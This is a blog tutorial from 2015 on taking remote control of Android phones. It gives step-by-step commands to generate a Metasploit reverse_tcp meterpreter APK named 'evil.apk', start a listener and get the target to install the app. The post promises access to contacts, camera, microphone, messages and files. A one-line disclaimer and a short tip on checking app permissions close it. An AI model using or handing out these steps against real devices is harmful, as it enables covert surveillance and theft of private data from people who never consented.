Friday, 23 January 2015

Hack To Remotely Control Any Android Device Using Kali Linux or Ubuntu

Hello everyone! Today we are back with an awesome tutorial on Hacking Android devices to Control them Remotely. There are,in fact, no user-friendly softwares out there that can simply hack any Android device on the go and retrieve the desired information. So, in order to achieve this we are going to take the coding way(though there is not much code), and we are going to use Linux operating system, Kali Linux and Ubuntu are recommended ones.

What actually are we doing:

In this tutorial, we are going to create a deploy application using Kali Linux Metasploit which should be installed on the target android device. When installed successfully, we can gain full access to that device.

What will you need:

1) A PC or Laptop running on Linux Operating System. If you are on windows or mac, you can do this on Oracle VM VirtualBox. Download it from here.

2) Active Internet Connection.

3) An Android device to test the hack. That's it!

What one can do with this hack: 

By the end of this tutorial, one can perform the below hacks after successfully installing the deploy application on target device.
  • Get contacts (and all theirs informations)
  • Take a picture from the camera
  • Stream sound from microphone (or other sources..)
  • Get all messages
  • Streaming video (for activity based client only)
  • Access file manager and many more...

The Main Procedure:

When you are all set, carefully follow the below steps one by one.(all the code you need to enter will be shown in red color)

step1: Open the terminal in Linux , type the below code and press enter.

:~# msfpayload android/meterpreter/reverse_tcp LHOST=youripaddress LPORT=anyport(8080 or 4444) R > evil.apk

If you don't know your ip address, simply open another terminal and type "ifconfig" without quotes. You can see your ip address beside wlan0 it would be something like 192.168.x.x (Note: you need to do this only when you are connected to Internet).

Step2: Now the deploy application evil.apk will be automatically generated. You can find it in home folder.

Step3: Now open another terminal and type the below code.

> msfconsole

It takes sometime for metasploit to download and load its contents. So be patient!

Step4: When metasploit successfully loaded type the below code.

> use exploit/multi/handler
> set payload android/meterpreter/reverse_tcp
> set lhost (the same ip address you entered in step1).
> set lport 8080 (the same port you used in step1).
> exploit

Now the console starts listening to at port 8080.

Step5: Now all you need to do is, copy the evil.apk from home folder to the target device.

Step6: Install the evil.apk on the target device and when the device is connected to the internet open the app.

Step7: As soon as you open the app in the device, you can see the connected device in console terminal.

Step8: Now you have full access to the device from the terminal. Just type help and you will be given with all the available commands.

Congrats! you have successfully hacked an android device.

Also See:

Note: Accessing other's device without their permission is completely illegal. This tutorial is for educational purpose only and never use it for any illegal purpose.

How to avoid these kind of apps:

From this tutorial you may have understood how easy it is to hack android devices. So to protect your self from being hacked you should check the app thoroughly before installing it. It is must to check app permissions before installing because the app cannot do anything without user's permission.